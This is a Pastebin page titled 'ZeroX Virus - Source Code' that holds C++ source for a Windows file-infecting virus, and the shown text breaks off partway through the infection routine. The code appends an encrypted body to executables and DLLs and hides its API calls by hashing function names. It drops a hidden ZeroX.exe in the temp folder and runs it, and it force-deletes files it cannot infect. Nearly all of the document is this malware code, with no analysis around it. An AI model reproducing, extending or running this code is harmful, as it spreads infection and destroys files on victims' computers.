API tools faq
paste
Advertisement
FlyFar

ZeroX Virus - Source Code

FlyFar
Mar 2nd, 2023
603
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C++ 32.71 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. #include <stdio.h>
  2. #include <Windows.h>
  3. #include <ImageHlp.h>
  4. #include "ntdll.h"
  5.  
  6. #pragma comment(lib,"imagehlp.lib")
  7. #pragma comment(lib,"ntdll.lib")
  8.  
  9. #pragma comment(linker,"/include:__tls_used")
  10. #pragma section(".CRT$XLB",read)
  11.  
  12. #define Align(Value,Alignment) (((Value+Alignment-1)/Alignment)*Alignment)
  13. #define <span class="searchlite">VIRUS</span>_MARKER L"ZeroX"
  14.  
  15. typedef enum _PE_TYPE
  16. {
  17.     PeInfected=1,
  18.     PeExe,
  19.     PeDll,
  20.     PeError,
  21.     PeInvalid
  22. }PE_TYPE,*PPE_TYPE;
  23.  
  24. typedef DWORD (WINAPI *pExpandEnvironmentStringsA)(
  25.     LPCSTR lpSrc,
  26.     LPSTR lpDst,
  27.     DWORD nSize
  28.     );
  29.  
  30. typedef HANDLE (WINAPI *pCreateFileA)(
  31.     LPCSTR lpFileName,
  32.     DWORD dwDesiredAccess,
  33.     DWORD dwShareMode,
  34.     LPSECURITY_ATTRIBUTES lpSecurityAttributes,
  35.     DWORD dwCreationDisposition,
  36.     DWORD dwFlagsAndAttributes,
  37.     HANDLE hTemplateFile
  38.     );
  39.  
  40. typedef BOOL (WINAPI *pWriteFile)(
  41.     HANDLE hFile,
  42.     LPCVOID lpBuffer,
  43.     DWORD nNumberOfBytesToWrite,
  44.     LPDWORD lpNumberOfBytesWritten,
  45.     LPOVERLAPPED lpOverlapped
  46.     );
  47.  
  48. typedef LPVOID (WINAPI *pVirtualAlloc)(
  49.     LPVOID lpAddress,
  50.     SIZE_T dwSize,
  51.     DWORD flAllocationType,
  52.     DWORD flProtect
  53.     );
  54.  
  55. typedef BOOL (WINAPI *pCloseHandle)(HANDLE Handle);
  56.  
  57. typedef BOOL (WINAPI *pVirtualFree)(
  58.     LPVOID lpAddress,
  59.     SIZE_T dwSize,
  60.     DWORD dwFreeType
  61.     );
  62.  
  63. typedef BOOL (WINAPI *pCreateProcessA)(
  64.     LPCSTR lpApplicationName,
  65.     LPSTR lpCommandLine,
  66.     LPSECURITY_ATTRIBUTES lpProcessAttributes,
  67.     LPSECURITY_ATTRIBUTES lpThreadAttributes,
  68.     BOOL bInheritHandles,
  69.     DWORD dwCreationFlags,
  70.     LPVOID lpEnvironment,
  71.     LPCSTR lpCurrentDirectory,
  72.     LPSTARTUPINFOA lpStartupInfo,
  73.     LPPROCESS_INFORMATION lpProcessInformation
  74.     );
  75.  
  76. typedef enum _HARDERROR_RESPONSE_OPTION
  77. {
  78.     OptionAbortRetryIgnore,
  79.     OptionOk,
  80.     OptionOkCancel,
  81.     OptionRetryCancel,
  82.     OptionYesNo,
  83.     OptionYesNoCancel,
  84.     OptionShutdownSystem,
  85.     OptionOkNoWait,
  86.     OptionCancelTryContinue
  87. }HARDERROR_RESPONSE_OPTION;
  88.  
  89. typedef enum _HARDERROR_RESPONSE
  90. {
  91.     ResponseReturnToCaller,
  92.     ResponseNotHandled,
  93.     ResponseAbort,
  94.     ResponseCancel,
  95.     ResponseIgnore,
  96.     ResponseNo,
  97.     ResponseOk,
  98.     ResponseRetry,
  99.     ResponseYes,
  100.     ResponseTryAgain,
  101.     ResponseContinue
  102. }HARDERROR_RESPONSE;
  103.  
  104. extern "C" NTSTATUS NTAPI NtRaiseHardError(
  105.     NTSTATUS ErrorStatus,
  106.     ULONG NumberOfParameters,
  107.     ULONG UnicodeStringParameterMask,
  108.     PULONG_PTR Parameters,
  109.     ULONG ValidResponseOptions,
  110.     PULONG Response
  111. );
  112.  
  113. PVOID <span class="searchlite">Virus</span>File;
  114. ULONG <span class="searchlite">Virus</span>Size,<span class="searchlite">Virus</span>FileChecksum;
  115.  
  116. wchar_t <span class="searchlite">Virus</span>Path[60];
  117.  
  118. void __fastcall RC4(PVOID Buffer,ULONG Length,PULONG Key)
  119. {
  120.     ULONG i,j,x;
  121.     UCHAR State[256],Swap,*k=(PUCHAR)Key,*ptr=(PUCHAR)Buffer;
  122.  
  123.     for(i=0;i<256;i++)
  124.     {
  125.         State[i]=(UCHAR)i;
  126.     }
  127.  
  128.     j=0;
  129.  
  130.     for(i=0;i<256;i++)
  131.     {
  132.         j=(j+State[i]+k[i % sizeof(ULONG)]) & 0xFF;
  133.         Swap=State[i];
  134.  
  135.         State[i]=State[j];
  136.         State[j]=Swap;
  137.     }
  138.  
  139.     i=0;
  140.     j=0;
  141.  
  142.     for(x=0;x<Length;x++)
  143.     {
  144.         i=(i+1) & 0xFF;
  145.         j=(j+State[i]) & 0xFF;
  146.  
  147.         Swap=State[i];
  148.  
  149.         State[i]=State[j];
  150.         State[j]=Swap;
  151.  
  152.         ptr[x]^=State[(State[i]+State[j]) & 0xFF];
  153.     }
  154. }
  155.  
  156. ULONG __fastcall ComputeHash(PVOID Buffer,ULONG Length)
  157. {
  158.     ULONG i,Hash=0,HashTable[256];
  159.     PUCHAR ptr=(PUCHAR)Buffer;
  160.  
  161.     for(i=0;i<256;i++)
  162.     {
  163.         HashTable[i]=(i & 1) ? (i+(i<<28))^0x12345678:(i+(i<<28))^0x98765432;
  164.     }
  165.  
  166.     for(i=0;i<Length;i++)
  167.     {
  168.         Hash=(i+Hash+HashTable[(Hash+ptr[i]-(~Hash)) & 0xFF])^((~ptr[i])+(ptr[i]<<16)-HashTable[(i+(Hash^ptr[i])) & 0xFF]);
  169.     }
  170.  
  171.     return Hash;
  172. }
  173.  
  174. PIMAGE_SECTION_HEADER __fastcall AddSection(PVOID Image,ULONG SectionSize,ULONG Characteristics)
  175. {
  176.     PIMAGE_DOS_HEADER pIDH;
  177.     PIMAGE_NT_HEADERS pINH;
  178.     PIMAGE_SECTION_HEADER pISH;
  179.  
  180.     ULONG i;
  181.  
  182.     pIDH=(PIMAGE_DOS_HEADER)Image;
  183.  
  184.     if(pIDH->e_magic!=IMAGE_DOS_SIGNATURE)
  185.     {
  186.         return NULL;
  187.     }
  188.  
  189.     pINH=(PIMAGE_NT_HEADERS)((PUCHAR)Image+pIDH->e_lfanew);
  190.  
  191.     if(pINH->Signature!=IMAGE_NT_SIGNATURE)
  192.     {
  193.         return NULL;
  194.     }
  195.  
  196.     pISH=(PIMAGE_SECTION_HEADER)(pINH+1);
  197.     i=pINH->FileHeader.NumberOfSections;
  198.  
  199.     memset(&pISH[i],0,sizeof(IMAGE_SECTION_HEADER));
  200.  
  201.     pISH[i].Misc.VirtualSize=SectionSize;
  202.     pISH[i].VirtualAddress=Align(pISH[i-1].VirtualAddress+pISH[i-1].Misc.VirtualSize,pINH->OptionalHeader.SectionAlignment);
  203.     pISH[i].SizeOfRawData=Align(SectionSize,pINH->OptionalHeader.SectionAlignment);
  204.     pISH[i].PointerToRawData=Align(pISH[i-1].PointerToRawData+pISH[i-1].SizeOfRawData,pINH->OptionalHeader.FileAlignment);
  205.     pISH[i].Characteristics=Characteristics;
  206.     pISH[i].PointerToRawData=Align(pISH[i-1].PointerToRawData+pISH[i-1].SizeOfRawData,pINH->OptionalHeader.FileAlignment);
  207.  
  208.     pINH->FileHeader.NumberOfSections++;
  209.     pINH->OptionalHeader.SizeOfImage=pISH[i].VirtualAddress+pISH[i].Misc.VirtualSize;
  210.  
  211.     pINH->OptionalHeader.CheckSum=0;
  212.     return &pISH[i];
  213. }
  214.  
  215. ULONG WINAPI Exe<span class="searchlite">Virus</span>Code()
  216. {
  217.     PIMAGE_DOS_HEADER pIDH;
  218.     PIMAGE_NT_HEADERS pINH;
  219.     PIMAGE_EXPORT_DIRECTORY pIED;
  220.  
  221.     PLDR_DATA_TABLE_ENTRY Ldr;
  222.  
  223.     PVOID Buffer,Module,Kernel32Base;
  224.     ULONG i,j,x,Hash,FileSize,Key,EntryPointRva,<span class="searchlite">Virus</span>Rva,write;
  225.  
  226.     PUCHAR Encrypted<span class="searchlite">Virus</span>,Decrypted<span class="searchlite">Virus</span>,k,ptr;
  227.     PULONG Function,Name;
  228.     PUSHORT Ordinal;
  229.  
  230.     UCHAR State[256],Swap;
  231.     HANDLE hFile;
  232.  
  233.     PPEB Peb;
  234.  
  235.     STARTUPINFOA si;
  236.     PROCESS_INFORMATION pi;
  237.  
  238.     pExpandEnvironmentStringsA fnExpandEnvironmentStringsA;
  239.     pCreateFileA fnCreateFileA;
  240.     pWriteFile fnWriteFile;
  241.     pVirtualAlloc fnVirtualAlloc;
  242.     pCloseHandle fnCloseHandle;
  243.     pVirtualFree fnVirtualFree;
  244.     pCreateProcessA fnCreateProcessA;
  245.  
  246.     char FilePath[]={'%','t','e','m','p','%','\\','Z','e','r','o','X','.','e','x','e',0},FileName[260];
  247.  
  248.     __asm
  249.     {
  250.         mov eax,0x41414141
  251.         mov EntryPointRva,eax
  252.  
  253.         mov eax,0x42424242
  254.         mov <span class="searchlite">Virus</span>Rva,eax
  255.  
  256.         mov eax,0x43434343
  257.         mov FileSize,eax
  258.     }
  259.  
  260.     Peb=(PPEB)__readfsdword(0x30); // Get the PEB address
  261.     Ldr=CONTAINING_RECORD(Peb->Ldr->InMemoryOrderModuleList.Flink,LDR_DATA_TABLE_ENTRY,InMemoryOrderLinks.Flink); // Read the loader data
  262.  
  263.     Ldr=CONTAINING_RECORD(Ldr->InMemoryOrderLinks.Flink,LDR_DATA_TABLE_ENTRY,InMemoryOrderLinks.Flink); // ntdll (not used)
  264.     Ldr=CONTAINING_RECORD(Ldr->InMemoryOrderLinks.Flink,LDR_DATA_TABLE_ENTRY,InMemoryOrderLinks.Flink); // kernel32
  265.  
  266.     Kernel32Base=Ldr->DllBase; // Store the address of kernel32
  267.     Module=Peb->ImageBaseAddress;
  268.  
  269.     pIDH=(PIMAGE_DOS_HEADER)Kernel32Base;
  270.     pINH=(PIMAGE_NT_HEADERS)((PUCHAR)Kernel32Base+pIDH->e_lfanew);
  271.  
  272.     // Get the export directory of kernel32
  273.  
  274.     pIED=(PIMAGE_EXPORT_DIRECTORY)((PUCHAR)Kernel32Base+pINH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
  275.  
  276.     Function=(PULONG)((PUCHAR)Kernel32Base+pIED->AddressOfFunctions);
  277.     Name=(PULONG)((PUCHAR)Kernel32Base+pIED->AddressOfNames);
  278.  
  279.     Ordinal=(PUSHORT)((PUCHAR)Kernel32Base+pIED->AddressOfNameOrdinals);
  280.  
  281.     // Loop over the function names
  282.  
  283.     for(i=0;i<pIED->NumberOfNames;i++)
  284.     {
  285.         PUCHAR ptr=(PUCHAR)Kernel32Base+Name[i]; // Pointer to function name
  286.         ULONG Hash=0;
  287.  
  288.         // Compute the hash
  289.  
  290.         while(*ptr)
  291.         {
  292.             Hash=((Hash<<8)+Hash+*ptr)^(*ptr<<16);
  293.             ptr++;
  294.         }
  295.  
  296.         // Hash of ExpandEnvironmentStringsA
  297.  
  298.         if(Hash==0x575d1e20)
  299.         {
  300.             fnExpandEnvironmentStringsA=(pExpandEnvironmentStringsA)((PUCHAR)Kernel32Base+Function[Ordinal[i]]);
  301.         }
  302.  
  303.         // Hash of CreateFileA
  304.  
  305.         if(Hash==0xd83eb415)
  306.         {
  307.             fnCreateFileA=(pCreateFileA)((PUCHAR)Kernel32Base+Function[Ordinal[i]]);
  308.         }
  309.  
  310.         // Hash of WriteFile
  311.  
  312.         if(Hash==0xa5e7378b)
  313.         {
  314.             fnWriteFile=(pWriteFile)((PUCHAR)Kernel32Base+Function[Ordinal[i]]);
  315.         }
  316.  
  317.         // Hash of VirtualAlloc
  318.  
  319.         if(Hash==0xa15d96d2)
  320.         {
  321.             fnVirtualAlloc=(pVirtualAlloc)((PUCHAR)Kernel32Base+Function[Ordinal[i]]);
  322.         }
  323.  
  324.         // Hash of CloseHandle
  325.  
  326.         if(Hash==0x7dfbd342)
  327.         {
  328.             fnCloseHandle=(pCloseHandle)((PUCHAR)Kernel32Base+Function[Ordinal[i]]);
  329.         }
  330.  
  331.         // Hash of VirtualFree
  332.  
  333.         if(Hash==0x6f043b69)
  334.         {
  335.             fnVirtualFree=(pVirtualFree)((PUCHAR)Kernel32Base+Function[Ordinal[i]]);
  336.         }
  337.  
  338.         // Hash of CreateProcessA
  339.  
  340.         if(Hash==0xae3b3c74)
  341.         {
  342.             fnCreateProcessA=(pCreateProcessA)((PUCHAR)Kernel32Base+Function[Ordinal[i]]);
  343.         }
  344.     }
  345.  
  346.     Encrypted<span class="searchlite">Virus</span>=(PUCHAR)Module+<span class="searchlite">Virus</span>Rva; // Get the <span class="searchlite">virus</span> body
  347.     Buffer=fnVirtualAlloc(NULL,FileSize,MEM_COMMIT|MEM_RESERVE,PAGE_READWRITE); // Allocate buffer
  348.  
  349.     if(Buffer)
  350.     {
  351.         pIDH=(PIMAGE_DOS_HEADER)Module;
  352.         pINH=(PIMAGE_NT_HEADERS)((PUCHAR)Module+pIDH->e_lfanew);
  353.  
  354.         Decrypted<span class="searchlite">Virus</span>=(PUCHAR)Buffer;
  355.  
  356.         Key=pINH->FileHeader.TimeDateStamp;
  357.         k=(PUCHAR)&Key;
  358.  
  359.         for(i=0;i<256;i++)
  360.         {
  361.             State[i]=(UCHAR)i;
  362.         }
  363.  
  364.         j=0;
  365.  
  366.         for(i=0;i<256;i++)
  367.         {
  368.             j=(j+State[i]+k[i % sizeof(ULONG)]) & 0xFF;    
  369.             Swap=State[i];
  370.  
  371.             State[i]=State[j];
  372.             State[j]=Swap;
  373.         }
  374.  
  375.         i=0;
  376.         j=0;
  377.  
  378.         for(x=0;x<FileSize;x++)
  379.         {
  380.             i=(i+1) & 0xFF;
  381.             j=(j+State[i]) & 0xFF;
  382.  
  383.             Swap=State[i];
  384.  
  385.             State[i]=State[j];      
  386.             State[j]=Swap;
  387.  
  388.             Decrypted<span class="searchlite">Virus</span>[x]=Encrypted<span class="searchlite">Virus</span>[x]^State[(State[i]+State[j]) & 0xFF];
  389.         }
  390.  
  391.         fnExpandEnvironmentStringsA(FilePath,FileName,sizeof(FileName));
  392.  
  393.         // Drop the <span class="searchlite">virus</span> in temp folder
  394.  
  395.         hFile=fnCreateFileA(FileName,GENERIC_READ|GENERIC_WRITE,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM,NULL);
  396.  
  397.         if(hFile!=INVALID_HANDLE_VALUE)
  398.         {
  399.             // Write the <span class="searchlite">virus</span> to file
  400.  
  401.             if(fnWriteFile(hFile,Buffer,FileSize,&write,NULL))
  402.             {
  403.                 fnCloseHandle(hFile); // Close the file handle
  404.                 fnVirtualFree(Buffer,0,MEM_RELEASE); // Free the buffer
  405.  
  406.                 ptr=(PUCHAR)&si;
  407.  
  408.                 // Zero the structures
  409.  
  410.                 for(i=0;i<sizeof(si);i++)
  411.                 {
  412.                     ptr[i]=0;
  413.                 }
  414.  
  415.                 ptr=(PUCHAR)&pi;
  416.  
  417.                 for(i=0;i<sizeof(pi);i++)
  418.                 {
  419.                     ptr[i]=0;
  420.                 }
  421.  
  422.                 // Run the <span class="searchlite">virus</span> executable
  423.  
  424.                 if(fnCreateProcessA(FileName,NULL,NULL,NULL,FALSE,0,NULL,NULL,&si,&pi))
  425.                 {
  426.                     fnCloseHandle(pi.hThread);
  427.                     fnCloseHandle(pi.hProcess);
  428.                 }
  429.             }
  430.         }
  431.     }
  432.  
  433.     // Call the original entry point
  434.  
  435.     __asm
  436.     {
  437.         mov eax,Module
  438.         add eax,EntryPointRva
  439.  
  440.         call eax
  441.     }
  442. }
  443.  
  444. ULONG WINAPI Dll<span class="searchlite">Virus</span>Code(HMODULE hModule,ULONG Reason,PVOID Context)
  445. {
  446.     PIMAGE_DOS_HEADER pIDH;
  447.     PIMAGE_NT_HEADERS pINH;
  448.     PIMAGE_EXPORT_DIRECTORY pIED;
  449.  
  450.     PLDR_DATA_TABLE_ENTRY Ldr;
  451.  
  452.     PVOID Buffer,Kernel32Base;
  453.     ULONG i,j,x,Hash,FileSize,Key,EntryPointRva,<span class="searchlite">Virus</span>Rva,write;
  454.  
  455.     PUCHAR Encrypted<span class="searchlite">Virus</span>,Decrypted<span class="searchlite">Virus</span>,k,ptr;
  456.     PULONG Function,Name;
  457.     PUSHORT Ordinal;
  458.  
  459.     UCHAR State[256],Swap;
  460.     HANDLE hFile;
  461.  
  462.     PPEB Peb;
  463.  
  464.     STARTUPINFOA si;
  465.     PROCESS_INFORMATION pi;
  466.  
  467.     pExpandEnvironmentStringsA fnExpandEnvironmentStringsA;
  468.     pCreateFileA fnCreateFileA;
  469.     pWriteFile fnWriteFile;
  470.     pVirtualAlloc fnVirtualAlloc;
  471.     pCloseHandle fnCloseHandle;
  472.     pVirtualFree fnVirtualFree;
  473.     pCreateProcessA fnCreateProcessA;
  474.  
  475.     char FilePath[]={'%','t','e','m','p','%','\\','Z','e','r','o','X','.','e','x','e',0},FileName[260];
  476.  
  477.     __asm
  478.     {
  479.         mov eax,0x41414141
  480.         mov EntryPointRva,eax
  481.  
  482.         mov eax,0x42424242
  483.         mov <span class="searchlite">Virus</span>Rva,eax
  484.  
  485.         mov eax,0x43434343
  486.         mov FileSize,eax
  487.     }
  488.  
  489.     Peb=(PPEB)__readfsdword(0x30); // Get the PEB address
  490.     Ldr=CONTAINING_RECORD(Peb->Ldr->InMemoryOrderModuleList.Flink,LDR_DATA_TABLE_ENTRY,InMemoryOrderLinks.Flink); // Read the loader data
  491.  
  492.     Ldr=CONTAINING_RECORD(Ldr->InMemoryOrderLinks.Flink,LDR_DATA_TABLE_ENTRY,InMemoryOrderLinks.Flink); // ntdll (not used)
  493.     Ldr=CONTAINING_RECORD(Ldr->InMemoryOrderLinks.Flink,LDR_DATA_TABLE_ENTRY,InMemoryOrderLinks.Flink); // kernel32
  494.  
  495.     Kernel32Base=Ldr->DllBase; // Store the address of kernel32
  496.  
  497.     pIDH=(PIMAGE_DOS_HEADER)Kernel32Base;
  498.     pINH=(PIMAGE_NT_HEADERS)((PUCHAR)Kernel32Base+pIDH->e_lfanew);
  499.  
  500.     // Get the export directory of kernel32
  501.  
  502.     pIED=(PIMAGE_EXPORT_DIRECTORY)((PUCHAR)Kernel32Base+pINH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
  503.  
  504.     Function=(PULONG)((PUCHAR)Kernel32Base+pIED->AddressOfFunctions);
  505.     Name=(PULONG)((PUCHAR)Kernel32Base+pIED->AddressOfNames);
  506.  
  507.     Ordinal=(PUSHORT)((PUCHAR)Kernel32Base+pIED->AddressOfNameOrdinals);
  508.  
  509.     // Loop over the function names
  510.  
  511.     for(i=0;i<pIED->NumberOfNames;i++)
  512.     {
  513.         PUCHAR ptr=(PUCHAR)Kernel32Base+Name[i]; // Pointer to function name
  514.         ULONG Hash=0;
  515.  
  516.         // Compute the hash
  517.  
  518.         while(*ptr)
  519.         {
  520.             Hash=((Hash<<8)+Hash+*ptr)^(*ptr<<16);
  521.             ptr++;
  522.         }
  523.  
  524.         // Hash of ExpandEnvironmentStringsA
  525.  
  526.         if(Hash==0x575d1e20)
  527.         {
  528.             fnExpandEnvironmentStringsA=(pExpandEnvironmentStringsA)((PUCHAR)Kernel32Base+Function[Ordinal[i]]);
  529.         }
  530.  
  531.         // Hash of CreateFileA
  532.  
  533.         if(Hash==0xd83eb415)
  534.         {
  535.             fnCreateFileA=(pCreateFileA)((PUCHAR)Kernel32Base+Function[Ordinal[i]]);
  536.         }
  537.  
  538.         // Hash of WriteFile
  539.  
  540.         if(Hash==0xa5e7378b)
  541.         {
  542.             fnWriteFile=(pWriteFile)((PUCHAR)Kernel32Base+Function[Ordinal[i]]);
  543.         }
  544.  
  545.         // Hash of VirtualAlloc
  546.  
  547.         if(Hash==0xa15d96d2)
  548.         {
  549.             fnVirtualAlloc=(pVirtualAlloc)((PUCHAR)Kernel32Base+Function[Ordinal[i]]);
  550.         }
  551.  
  552.         // Hash of CloseHandle
  553.  
  554.         if(Hash==0x7dfbd342)
  555.         {
  556.             fnCloseHandle=(pCloseHandle)((PUCHAR)Kernel32Base+Function[Ordinal[i]]);
  557.         }
  558.  
  559.         // Hash of VirtualFree
  560.  
  561.         if(Hash==0x6f043b69)
  562.         {
  563.             fnVirtualFree=(pVirtualFree)((PUCHAR)Kernel32Base+Function[Ordinal[i]]);
  564.         }
  565.  
  566.         // Hash of CreateProcessA
  567.  
  568.         if(Hash==0xae3b3c74)
  569.         {
  570.             fnCreateProcessA=(pCreateProcessA)((PUCHAR)Kernel32Base+Function[Ordinal[i]]);
  571.         }
  572.     }
  573.  
  574.     Encrypted<span class="searchlite">Virus</span>=(PUCHAR)hModule+<span class="searchlite">Virus</span>Rva; // Get the <span class="searchlite">virus</span> body
  575.     Buffer=fnVirtualAlloc(NULL,FileSize,MEM_COMMIT|MEM_RESERVE,PAGE_READWRITE); // Allocate buffer
  576.  
  577.     if(Buffer)
  578.     {
  579.         pIDH=(PIMAGE_DOS_HEADER)hModule;
  580.         pINH=(PIMAGE_NT_HEADERS)((PUCHAR)hModule+pIDH->e_lfanew);
  581.  
  582.         Decrypted<span class="searchlite">Virus</span>=(PUCHAR)Buffer;
  583.  
  584.         Key=pINH->FileHeader.TimeDateStamp;
  585.         k=(PUCHAR)&Key;
  586.  
  587.         for(i=0;i<256;i++)
  588.         {
  589.             State[i]=(UCHAR)i;
  590.         }
  591.  
  592.         j=0;
  593.  
  594.         for(i=0;i<256;i++)
  595.         {
  596.             j=(j+State[i]+k[i % sizeof(ULONG)]) & 0xFF;    
  597.             Swap=State[i];
  598.  
  599.             State[i]=State[j];
  600.             State[j]=Swap;
  601.         }
  602.  
  603.         i=0;
  604.         j=0;
  605.  
  606.         for(x=0;x<FileSize;x++)
  607.         {
  608.             i=(i+1) & 0xFF;
  609.             j=(j+State[i]) & 0xFF;
  610.  
  611.             Swap=State[i];
  612.  
  613.             State[i]=State[j];      
  614.             State[j]=Swap;
  615.  
  616.             Decrypted<span class="searchlite">Virus</span>[x]=Encrypted<span class="searchlite">Virus</span>[x]^State[(State[i]+State[j]) & 0xFF];
  617.         }
  618.  
  619.         fnExpandEnvironmentStringsA(FilePath,FileName,sizeof(FileName));
  620.  
  621.         // Drop the <span class="searchlite">virus</span> in temp folder
  622.  
  623.         hFile=fnCreateFileA(FileName,GENERIC_READ|GENERIC_WRITE,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM,NULL);
  624.  
  625.         if(hFile!=INVALID_HANDLE_VALUE)
  626.         {
  627.             // Write the <span class="searchlite">virus</span> to file
  628.  
  629.             if(fnWriteFile(hFile,Buffer,FileSize,&write,NULL))
  630.             {
  631.                 fnCloseHandle(hFile); // Close the file handle
  632.                 fnVirtualFree(Buffer,0,MEM_RELEASE); // Free the buffer
  633.  
  634.                 ptr=(PUCHAR)&si;
  635.  
  636.                 // Zero the structures
  637.  
  638.                 for(i=0;i<sizeof(si);i++)
  639.                 {
  640.                     ptr[i]=0;
  641.                 }
  642.  
  643.                 ptr=(PUCHAR)&pi;
  644.  
  645.                 for(i=0;i<sizeof(pi);i++)
  646.                 {
  647.                     ptr[i]=0;
  648.                 }
  649.  
  650.                 // Run the <span class="searchlite">virus</span> executable
  651.  
  652.                 if(fnCreateProcessA(FileName,NULL,NULL,NULL,FALSE,0,NULL,NULL,&si,&pi))
  653.                 {
  654.                     fnCloseHandle(pi.hThread);
  655.                     fnCloseHandle(pi.hProcess);
  656.                 }
  657.             }
  658.         }
  659.     }
  660.  
  661.     // Call the original entry point
  662.  
  663.     __asm
  664.     {
  665.         mov eax,hModule
  666.         add eax,EntryPointRva
  667.  
  668.         push Context
  669.         push Reason
  670.         push hModule
  671.  
  672.         call eax
  673.     }
  674. }
  675.  
  676. void WINAPI <span class="searchlite">Virus</span>End()
  677. {
  678.     return;
  679. }
  680.  
  681. ULONG __fastcall IsValidExecutable(HANDLE hFile,PULONG SectionAlignment)
  682. {
  683.     PIMAGE_DOS_HEADER pIDH;
  684.     PIMAGE_NT_HEADERS pINH;
  685.  
  686.     BOOL IsDll;
  687.      
  688.     PVOID Buffer;
  689.     ULONG FileSize,read;
  690.  
  691.     FileSize=GetFileSize(hFile,NULL);
  692.     Buffer=VirtualAlloc(NULL,FileSize,MEM_COMMIT|MEM_RESERVE,PAGE_READWRITE);
  693.  
  694.     if(!Buffer)
  695.     {
  696.         return PeError;
  697.     }
  698.  
  699.     if(!ReadFile(hFile,Buffer,FileSize,&read,NULL))
  700.     {
  701.         VirtualFree(Buffer,0,MEM_RELEASE);
  702.         return PeError;
  703.     }
  704.  
  705.     __try
  706.     {
  707.         if(ComputeHash(Buffer,FileSize)==<span class="searchlite">Virus</span>FileChecksum)
  708.         {
  709.             VirtualFree(Buffer,0,MEM_RELEASE);
  710.             return PeInfected;
  711.         }
  712.  
  713.         pIDH=(PIMAGE_DOS_HEADER)Buffer;
  714.          
  715.         if(pIDH->e_magic!=IMAGE_DOS_SIGNATURE)
  716.         {
  717.             VirtualFree(Buffer,0,MEM_RELEASE);
  718.             return PeInvalid;
  719.         }
  720.  
  721.         pINH=(PIMAGE_NT_HEADERS)((PUCHAR)Buffer+pIDH->e_lfanew);
  722.  
  723.         if(pINH->Signature!=IMAGE_NT_SIGNATURE)
  724.         {
  725.             VirtualFree(Buffer,0,MEM_RELEASE);
  726.             return PeInvalid;
  727.         }
  728.  
  729.         // Make sure it is 32-bit program
  730.  
  731.         if(pINH->FileHeader.Machine!=IMAGE_FILE_MACHINE_I386)
  732.         {
  733.             VirtualFree(Buffer,0,MEM_RELEASE);
  734.             return PeInvalid;
  735.         }
  736.  
  737.         if(pINH->OptionalHeader.Subsystem!=IMAGE_SUBSYSTEM_WINDOWS_GUI && pINH->OptionalHeader.Subsystem!=IMAGE_SUBSYSTEM_WINDOWS_CUI)
  738.         {
  739.             VirtualFree(Buffer,0,MEM_RELEASE);
  740.             return PeInvalid;
  741.         }
  742.  
  743.         if(!wcscmp(<span class="searchlite">VIRUS</span>_MARKER,(PWSTR)(pIDH+1)))
  744.         {
  745.             VirtualFree(Buffer,0,MEM_RELEASE);
  746.             return PeInfected;
  747.         }
  748.  
  749.         if(pINH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR].VirtualAddress)
  750.         {
  751.             VirtualFree(Buffer,0,MEM_RELEASE);
  752.             return PeInvalid;
  753.         }
  754.  
  755.         if(pINH->OptionalHeader.Subsystem==IMAGE_SUBSYSTEM_WINDOWS_CUI || pINH->OptionalHeader.Subsystem==IMAGE_SUBSYSTEM_WINDOWS_GUI)
  756.         {
  757.             IsDll=(pINH->FileHeader.Characteristics & IMAGE_FILE_DLL)!=0;
  758.             *SectionAlignment=pINH->OptionalHeader.FileAlignment;
  759.  
  760.             VirtualFree(Buffer,0,MEM_RELEASE);
  761.             return IsDll ? PeDll:PeExe;
  762.         }
  763.     }
  764.  
  765.     __except(EXCEPTION_EXECUTE_HANDLER)
  766.     {
  767.         VirtualFree(Buffer,0,MEM_RELEASE);
  768.         return FALSE;
  769.     }
  770.  
  771.     VirtualFree(Buffer,0,MEM_RELEASE);
  772.     return FALSE;
  773. }
  774.  
  775. void __fastcall ForceDeleteFile(PWSTR FileName)
  776. {
  777.     UNICODE_STRING Name;
  778.     OBJECT_ATTRIBUTES oa;
  779.  
  780.     // Convert Win32 pathname to NT pathname
  781.  
  782.     if(RtlDosPathNameToNtPathName_U(FileName,&Name,NULL,NULL))
  783.     {
  784.         InitializeObjectAttributes(&oa,&Name,OBJ_CASE_INSENSITIVE,NULL,NULL);
  785.         NtDeleteFile(&oa); // Delete the file
  786.  
  787.         RtlFreeUnicodeString(&Name); // Free the string
  788.     }
  789. }
  790.  
  791. void __fastcall InfectFile(PWSTR FileName)
  792. {
  793.     PIMAGE_DOS_HEADER pIDH;
  794.     PIMAGE_NT_HEADERS pINH;
  795.     PIMAGE_SECTION_HEADER pISH;
  796.      
  797.     HANDLE hFile,hMap;
  798.     PVOID MappedFile;
  799.     ULONG i,Key,PeType,FileSize,SectionAlignment,SectionSize,CodeSize,NewSize,OldChecksum,NewChecksum;
  800.  
  801.     PUCHAR CodeAddress,<span class="searchlite">Virus</span>Address,ptr;
  802.  
  803.     hFile=CreateFile(FileName,GENERIC_READ|GENERIC_WRITE,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,OPEN_EXISTING,0,NULL);
  804.  
  805.     if(hFile!=INVALID_HANDLE_VALUE)
  806.     {
  807.         PeType=IsValidExecutable(hFile,&SectionAlignment);
  808.  
  809.         if(PeType==PeError || PeType==PeInfected)
  810.         {
  811.             NtClose(hFile);
  812.             return;
  813.         }
  814.  
  815.         if(PeType==PeInvalid)
  816.         {
  817.             NtClose(hFile);
  818.  
  819.             ForceDeleteFile(FileName);
  820.             return;
  821.         }
  822.  
  823.         CodeSize=PeType==PeDll ? (ULONG)<span class="searchlite">Virus</span>End-(ULONG)Dll<span class="searchlite">Virus</span>Code:(ULONG)Dll<span class="searchlite">Virus</span>Code-(ULONG)Exe<span class="searchlite">Virus</span>Code;
  824.         SectionSize=CodeSize+<span class="searchlite">Virus</span>Size+SectionAlignment;
  825.  
  826.         FileSize=GetFileSize(hFile,NULL);
  827.         NewSize=FileSize+Align(SectionSize,SectionAlignment); // File size need to be aligned. Otherwise the program will not run after infection.
  828.  
